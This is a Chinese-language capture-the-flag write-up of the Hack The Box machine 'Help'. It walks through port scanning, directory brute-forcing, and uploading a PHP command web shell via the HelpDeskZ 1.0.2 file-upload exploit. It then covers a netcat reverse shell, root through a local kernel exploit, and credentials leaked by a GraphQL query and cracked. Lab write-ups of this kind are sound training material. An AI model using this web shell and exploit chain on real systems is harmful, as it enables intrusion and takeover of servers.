超越平凡的生活
15 May 2019
Help (HTB 靶机测试)
0x00
前期准备 进入到HTB acces页面配置vpn
下载对应的配置 openvpn xx.ovpn 文件
配置好对应网络
从页面上就可以看到是否连接成功/ipv4地址/ipv6地址/流量/服务器地址/服务器端口
然后进入靶机场 挑选合适的靶机进行练手
0x01
- 靶机地址
- 目标ip 10.10.10.121
- 本机ip 10.10.14.37
- 本机增加靶机路由
- 使用nmap 扫描一下端口
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-15 06:36 GMT
Nmap scan report for 10.10.10.121
Host is up (0.24s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3000/tcp open ppp
Nmap done: 1 IP address (1 host up) scanned in 4.16 seconds
有80看看80有啥信息么 没有啥信息 标准的apache2页面
-
dirb http://10.10.10.121/ /usr/share/dirb/wordlists/small.txt
看看有啥发现 遍历web页面目录
真有发现 找到了 http://10.10.10.121/support 有东西
找到一个貌似订票网站 http://10.10.10.121/support 里面要用户名和密码登录
貌似是开源[HelpDeskz]搭建(http://www.helpdeskz.com/)
dirb http://10.10.10.121/ /usr/share/dirb/wordlists/small.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed May 15 06:39:04 2019
URL_BASE: http://10.10.10.121/
WORDLIST_FILES: /usr/share/dirb/wordlists/small.txt
-----------------
GENERATED WORDS: 959
---- Scanning URL: http://10.10.10.121/ ----
==> DIRECTORY: http://10.10.10.121/javascript/
==> DIRECTORY: http://10.10.10.121/support/
---- Entering directory: http://10.10.10.121/javascript/ ----
---- Entering directory: http://10.10.10.121/support/ ----
==> DIRECTORY: http://10.10.10.121/support/css/
==> DIRECTORY: http://10.10.10.121/support/images/
==> DIRECTORY: http://10.10.10.121/support/includes/
==> DIRECTORY: http://10.10.10.121/support/js/
==> DIRECTORY: http://10.10.10.121/support/uploads/
==> DIRECTORY: http://10.10.10.121/support/views/
---- Entering directory: http://10.10.10.121/support/css/ ----
---- Entering directory: http://10.10.10.121/support/images/ ----
---- Entering directory: http://10.10.10.121/support/includes/ ----
==> DIRECTORY: http://10.10.10.121/support/includes/classes/
---- Entering directory: http://10.10.10.121/support/js/ ----
---- Entering directory: http://10.10.10.121/support/uploads/ ----
---- Entering directory: http://10.10.10.121/support/views/ ----
==> DIRECTORY: http://10.10.10.121/support/views/client/
==> DIRECTORY: http://10.10.10.121/support/views/staff/
---- Entering directory: http://10.10.10.121/support/includes/classes/ ----
---- Entering directory: http://10.10.10.121/support/views/client/ ----
---- Entering directory: http://10.10.10.121/support/views/staff/ ----
-----------------
END_TIME: Wed May 15 07:30:54 2019
DOWNLOADED: 11508 - FOUND: 0
0x02
-
在订票页面可以上传附件
在searchsploit看看有没有啥发现 果然有任意文件上传 看poc貌似是源代码上传附件没有做检查,
只是利用时间计算重新md5更改名字,并且找到HelpDeskZ源代码文件
searchsploit HelpDeskZ ---exclude='(PoC)|/dos/'
------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------- ----------------------------------------
HelpDeskZ 1.0.2 - Arbitrary File Upload | exploits/php/webapps/40300.py
HelpDeskZ < 1.0.2 - (Authenticated) SQL Injection / Unauthorized File Do | exploits/php/webapps/41200.py
------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
0x03
- 准备好php文件,先试一个小的文件 试一下poc是否好用
cat test.php <?php echo(system($_GET["cmd"])); ?> - exploits/php/webapps/40300.py 下的需要更改一下少了几个冒号 增加一些打印信息
打印一下获取服务器时区 好能比较时间戳 将本机时区改成GMT
-
看看源代码找到存放附件的路径 http://10.10.10.121/support/uploads/tickets/
-
网页上传附件 图片验证成功 网页会有File is not_allowed 提示
-
运行脚本python 40300.py http://10.10.10.121/support/uploads/tickets/ test.php
查出上传附件目录名称
python 40300.py http://10.10.10.121/support/uploads/tickets/ test.php
Helpdeskz v1.0.2 - Unauthenticated shell upload exploit
Wed, 15 May 2019 07:24:21 GMT
http://10.10.10.121/support/uploads/tickets/
test.php
1557905053
This is the 0 time:
has tried http://10.10.10.121/support/uploads/tickets/abb3155110dcac0bd0df07c4506923a7.php:404
This is the 1 time:
has tried http://10.10.10.121/support/uploads/tickets/a1d5c3e401494104b8b92cc6e10d59f1.php:404
This is the 2 time:
has tried http://10.10.10.121/support/uploads/tickets/c30228a151cfe8f8756b828eb82243ad.php:404
This is the 3 time:
has tried http://10.10.10.121/support/uploads/tickets/6e455800983a553f7c2afb10f622f9f7.php:404
This is the 4 time:
found!
http://10.10.10.121/support/uploads/tickets/a832970fedd21fb756a2bfbb18544869.php
- 执行一下命令看看是否好用 发现账号是help
curl http://10.10.10.121/support/uploads/tickets/a832970fedd21fb756a2bfbb18544869.php?cmd=id
uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)
uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)
-
同样的步骤挂马 上传反弹shellphp
-
登录到靶机的help用户下 找到user.txt
curl http://10.10.10.121/support/uploads/tickets/a832970fedd21fb756a2bfbb18544869.php?cmd=cat+/home/help/user.txt
bb8a7b36bdce0c61ccebaa173ef946af
0x04
- 获取root权限 利用4.4.0-116-generic下exploits/linux/local/44298.c获取root权限
nc -lvp 1234
listening on [any] 1234 ...
10.10.10.121: inverse host lookup failed: Unknown host
connect to [10.10.14.37] from (UNKNOWN) [10.10.10.121] 57236
Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
00:48:39 up 57 min, 0 users, load average: 0.02, 0.01, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn("/bin/bash")'
help@help:/$
- 利用nc上传文件44298.c gcc编译payload获取root 权限以及flag b7fe6082dcdf0c1b1e02ab0d9daddb9
nc -w 3 10.10.10.121 39808 < payload.c
nc -l -p 39808 > payload.c
gcc -g payload.c -o payload && ./payload
0x05
-
3000端口 nodejs
页面访问 http://10.10.10.121:3000/graphql?query={user{username%20password}}
得到http://10.10.10.121/support 下的登录帐号和密码 helpme@helpme.com/5d3c93182bb20f07b994a7f617e99cff
cat /home/help/help/src/graphql/schema/resolvers/index.js下面也能得到页面信息
通过hash cracker页面获得到密码 godhelpmeplz
通过页面登录上去 好像也没有啥鸟用 其实是利用HelpDeskZ < 1.0.2 - (Authenticated) SQL Injection
第二个漏洞来进行sql注入获得权限